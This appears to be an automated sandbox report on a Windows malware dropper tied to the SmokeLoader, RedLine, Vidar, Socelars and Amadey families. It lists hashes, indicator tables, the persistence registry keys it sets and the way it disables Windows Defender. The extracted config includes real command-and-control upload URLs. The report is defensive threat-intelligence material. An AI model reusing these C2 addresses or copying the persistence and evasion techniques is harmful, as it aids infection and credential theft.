amadey | 070798072999f8c0c6bdf3c166e42c2eeb2d50a446d2710a2b581c51dd221b3d

Resubmissions

26-10-2021 05:38

211026-gbxwasghb2 10

23-10-2021 15:47

211023-s8gq5acdb8 10

Analysis

max time kernel
81s
max time network
1815s
platform
windows10_x64
resource
win10-en-20210920
submitted
26-10-2021 05:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ha.exe
Size

4.9MB
MD5

2e366651b4505eadbeca48889144f452
SHA1

4c729b09c03f98019c0cf19fd3f22b7500772f3f
SHA256

070798072999f8c0c6bdf3c166e42c2eeb2d50a446d2710a2b581c51dd221b3d
SHA512

6ab6940151b61c03a18b0157e59d4918ac64237cad1f399d0a04d03ecf651145158c84515a2e74a925ea4cc3386b459cc049cd645ec52babc6287ee4127bad5f

Score

10^/10

amadey redline smokeloader socelars vidar 933 aspackv2 backdoor discovery evasion infostealer persistence spyware stealer trojan

Malware Config

Extracted

Family

smokeloader

Version

2020

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

rc4.i32

Extracted

Family

vidar

Version

41.5

Botnet

933

https://mas.to/@xeroxxx

Attributes

profile_id
933

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 4 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6212	1220	rundll32.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6584	1220	rundll32.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5192	1220	rundll32.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6560	1220	rundll32.exe	142

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 3 IoCs

resource	yara_rule
behavioral1/memory/2020-287-0x00000000050A0000-0x00000000050DB000-memory.dmp	family_redline
behavioral1/memory/2140-312-0x0000000000418542-mapping.dmp	family_redline
behavioral1/memory/4956-301-0x0000000004FA0000-0x0000000004FDB000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000400000001ac48-179.dat	family_socelars
behavioral1/files/0x000400000001ac48-213.dat	family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 504 created 1732	504	WerFault.exe	97

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral1/memory/2528-373-0x0000000000A00000-0x0000000000B4A000-memory.dmp	family_vidar
behavioral1/memory/2528-375-0x0000000000400000-0x00000000008EF000-memory.dmp	family_vidar

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x000400000001ac3b-130.dat	aspack_v212_v242
behavioral1/files/0x000400000001ac3b-132.dat	aspack_v212_v242
behavioral1/files/0x000400000001ac3c-129.dat	aspack_v212_v242
behavioral1/files/0x000400000001ac3c-134.dat	aspack_v212_v242
behavioral1/files/0x000400000001ac3e-136.dat	aspack_v212_v242
behavioral1/files/0x000400000001ac3e-138.dat	aspack_v212_v242

Blocklisted process makes network request 1 IoCs

flow	pid	Process
170	3204	cmd.exe

Downloads MZ/PE file

Executes dropped EXE 58 IoCs

pid	Process
368	CrowdInspect64.exe
948	setup_x86_x64_install.exe
2464	setup_installer.exe
2816	setup_install.exe
1772	Sat14d32a38896785b13.exe
3192	Sat14f1396dfcf191bd.exe
8	Sat142b09ae40c44cf.exe
1732	Sat14febbc433.exe
4636	Sat14514904a4b.exe
4052	Sat142ac5249376e895.exe
4024	Sat1487ca754e680f91.exe
4300	Sat14b47e86b9c16b.exe
2800	Sat144474a564d26f29.exe
3416	Sat1481f5a7e3eccdd.exe
2712	Sat1427fbafcf251.exe
4936	Sat14a7594cc5a0116.exe
1164	Sat1481f5a7e3eccdd.tmp
680	Sat1481f5a7e3eccdd.exe
4952	6377462.exe
1184	Sat1481f5a7e3eccdd.tmp
2020	6661930.exe
2392	LzmwAqmV.exe
4956	8701109.exe
4368	WerFault.exe
1744	4818869.exe
4204	Wf_rqs0C8NUD79vdgP8LjtWh.exe
2140	Sat1427fbafcf251.exe
1552	inst1.exe
2528	Soft1WW02.exe
3280	WinHoster.exe
4244	4.exe
740	5.exe
4600	JYCWewAX2vPOJ.EXE
5056	search_hyperfs_206.exe
2236	postback.exe
744	setup.exe
3204	cmd.exe
4452	Chrome5.exe
2508	setup_x86_x64_install.exe
5264	Calculator.exe
5416	kPBhgOaGQk.exe
5556	setup_install.exe
5940	LzmwAqmV.exe
6112	Sat14d32a38896785b13.exe
6136	Sat14a7594cc5a0116.exe
4368	WerFault.exe
2780	Sat14514904a4b.exe
5452	Sat1481f5a7e3eccdd.tmp
5432	Sat1481f5a7e3eccdd.exe
5884	Sat1487ca754e680f91.exe
5868	Calculator.exe
5744	Sat14f1396dfcf191bd.exe
5920	WerFault.exe
6088	Q__E9dnTTvzMRDObKFW3jYTq.exe
5740	Sat1481f5a7e3eccdd.tmp
5644	Q__E9dnTTvzMRDObKFW3jYTq.exe
5476	aXhWwRlFiTz_d9ZgGw_y44PI.exe
5796	BgKbBly8MYhyBVMR7YcPo8F2.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation	CrowdInspect64.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation	Sat144474a564d26f29.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation	Sat1487ca754e680f91.exe

Loads dropped DLL 17 IoCs

pid	Process
2816	setup_install.exe
2816	setup_install.exe
2816	setup_install.exe
2816	setup_install.exe
2816	setup_install.exe
2816	setup_install.exe
1164	Sat1481f5a7e3eccdd.tmp
1184	Sat1481f5a7e3eccdd.tmp
3204	cmd.exe
3204	cmd.exe
5556	setup_install.exe
5556	setup_install.exe
5556	setup_install.exe
5556	setup_install.exe
5556	setup_install.exe
5452	Sat1481f5a7e3eccdd.tmp
5740	Sat1481f5a7e3eccdd.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	WerFault.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 12 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
404	ipinfo.io
406	ipinfo.io
446	ipinfo.io
565	ipinfo.io
571	ipinfo.io
751	ip-api.com
102	ip-api.com
196	ipinfo.io
197	ipinfo.io
199	ipinfo.io
564	ipinfo.io
688	ip-api.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2712 set thread context of 2140	2712	Sat1427fbafcf251.exe	117

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Sat1481f5a7e3eccdd.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-8I05A.tmp	Sat1481f5a7e3eccdd.tmp
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Sat1481f5a7e3eccdd.tmp

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 19 IoCs

pid	pid_target	Process	procid_target
2940	1732	WerFault.exe	97
1856	1732	WerFault.exe	97
4668	1732	WerFault.exe	97
1308	1732	WerFault.exe	97
2748	744	WerFault.exe	138
3464	744	WerFault.exe	138
5192	744	WerFault.exe	138
5280	1732	WerFault.exe	97
5432	744	WerFault.exe	138
5740	744	WerFault.exe	138
5192	1732	WerFault.exe	97
5436	740	WerFault.exe	134
4368	5868	WerFault.exe	194
504	1732	WerFault.exe	97
5920	744	WerFault.exe	138
2268	5868	WerFault.exe	194
5424	5868	WerFault.exe	194
4368	5868	WerFault.exe	194
6504	6112	WerFault.exe	168

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sat14a7594cc5a0116.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sat14a7594cc5a0116.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sat14a7594cc5a0116.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sat14a7594cc5a0116.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sat14a7594cc5a0116.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sat14a7594cc5a0116.exe

Creates scheduled task(s) 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3224	schtasks.exe
3580	schtasks.exe
4704	schtasks.exe
6500	schtasks.exe
5516	schtasks.exe
7028	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
8808	timeout.exe

Kills process with taskkill 6 IoCs

evasion

pid	Process
4312	taskkill.exe
5888	taskkill.exe
3152	taskkill.exe
3804	taskkill.exe
5512	taskkill.exe
4604	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = eda47e9320aed701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	ha.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 0100000054a111a7c60ac89d565a006a79c774e95c6c2f9fbab96700931d76b9090e558c9de8091ded54a604ee1b901f80a2a73c4f7ac9b117b0fb69e9d9904694f9608290c4317215e08930701a54ae189dcfa883c1ad985e7766a89186	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "{D1767771-8C43-4DBA-AE6C-2DB3CC0568BD}"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = eda47e9320aed701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\InProgressFlags = "262144"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 806585e676cad701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete\C:\Users\Admin\AppData\Local\Pack = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 010000006c320a237eb7b0e35e344f6cf199ed61f4d414c5f2df47b8eb8aa48e0126dda9b580b732a5ec4ba8c03414f816883120eb282f6afa6b95cdc151	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{E92F58E6-C1A8-471B-AAD9-FFE426E6CC97}"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\InProgressFlags = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
